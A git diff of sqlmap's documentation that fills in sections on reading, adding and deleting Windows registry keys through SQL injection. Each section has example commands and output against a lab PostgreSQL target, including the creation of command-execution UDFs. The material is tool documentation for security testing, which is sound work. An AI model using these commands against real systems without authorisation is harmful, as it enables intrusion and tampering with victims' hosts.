diff --git a/doc/README.sgml b/doc/README.sgml index 3c8d15b23..0cf2681ea 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -5254,68 +5254,164 @@ meterpreter > exit Windows registry access +

+It is possible to access Windows registry when the back-end +database management system is either MySQL, PostgreSQL or +Microsoft SQL Server, and when the underlying database layer +supports stacked SQL queries. Also, session user has to have +the needed privileges to access it. + Read a Windows registry key value

Option: --reg-read

-TODO +Using this option you can read registry key values. +

+Example on a PostgreSQL 8.4 target: -Write a Windows registry key value data + +$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read + +[...] +web server operating system: Windows +web application technology: PHP 5.3.1, Apache 2.2.14 +back-end DBMS: PostgreSQL + +[hh:mm:15] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:15] [INFO] detecting back-end DBMS version from its banner +[hh:mm:15] [INFO] retrieved: 8.4.2, +[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:23] [INFO] the back-end DBMS operating system is Windows +[hh:mm:23] [INFO] testing if current user is DBA +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist +[hh:mm:23] [INFO] retrieved: 0 +[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist +[hh:mm:24] [INFO] retrieved: 0 +[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file +[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file +which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion] +which registry key value do you want to read? [ProductName] +[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName' +[hh:mm:35] [INFO] retrieved: ProductName REG_SZ Microsoft Windows XP +Registry key value data: 'ProductName REG_SZ Microsoft Windows XP' +[...] + + +Write a Windows registry key value

Option: --reg-add

-TODO +Using this option you can write registry key values. +

+Example on a PostgreSQL 8.4 target: -Delete a Windows registry key value + +$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add + +[...] +web server operating system: Windows +web application technology: PHP 5.3.1, Apache 2.2.14 +back-end DBMS: PostgreSQL + +[hh:mm:20] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:20] [INFO] detecting back-end DBMS version from its banner +[hh:mm:20] [INFO] retrieved: 8.4.2, +[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:29] [INFO] retrieved: 1 +[hh:mm:30] [INFO] the back-end DBMS operating system is Windows +[hh:mm:30] [INFO] testing if current user is DBA +[hh:mm:30] [INFO] retrieved: 1 +[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist +[hh:mm:30] [INFO] retrieved: 0 +[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file +which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap +which registry key value do you want to write? Test +which registry key value data do you want to write? 1 +which registry key value data-type is it? [REG_SZ] REG_DWORD +[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test' with data '1'. This will +work only if the user running the database process has privileges to modify the Windows registry. + +[*] shutting down at: hh:mm:42 + + +Delete a Windows registry key

Option: --reg-del

-TODO - - -Windows registry key +Using this option you can delete registry keys.

-Option: --reg-key +Example on a PostgreSQL 8.4 target: + + +$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del + +[...] +web server operating system: Windows +web application technology: PHP 5.3.1, Apache 2.2.14 +back-end DBMS: PostgreSQL + +[hh:mm:20] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:20] [INFO] detecting back-end DBMS version from its banner +[hh:mm:20] [INFO] retrieved: 8.4.2, +[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:29] [INFO] retrieved: 1 +[hh:mm:30] [INFO] the back-end DBMS operating system is Windows +[hh:mm:30] [INFO] testing if current user is DBA +[hh:mm:30] [INFO] retrieved: 1 +[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist +[hh:mm:30] [INFO] retrieved: 0 +[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file +which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap +which registry key value do you want to delete? Test +are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test? [y/N] y +[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'. This will work only +if the user running the database process has privileges to modify the Windows registry. + +[*] shutting down at: hh:mm:27 + + +Auxiliary registry switches

-TODO - - -Windows registry key value +Option: --reg-key, --reg-value, +--reg-data and --reg-type

-Option: --reg-value +These switches can be used to provide data needed for proper running of +options --reg-read, --reg-add and +--reg-del. So, instead of providing registry key +information when asked, you can use them at command prompt as program +arguments.

-TODO - - -Windows registry key value data +With --reg-key option you specify used windows +registry key path, with --reg-value value item +name inside provided key, with --reg-data value +data, while with --reg-type option you specify +type of the value item.

-Option: --reg-data - -

-TODO - - -Windows registry key value type - -

-Option: --reg-type - -

-TODO +So, another way of running example from option +--reg-add could be: + +$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add\ + --reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1 + Miscellaneous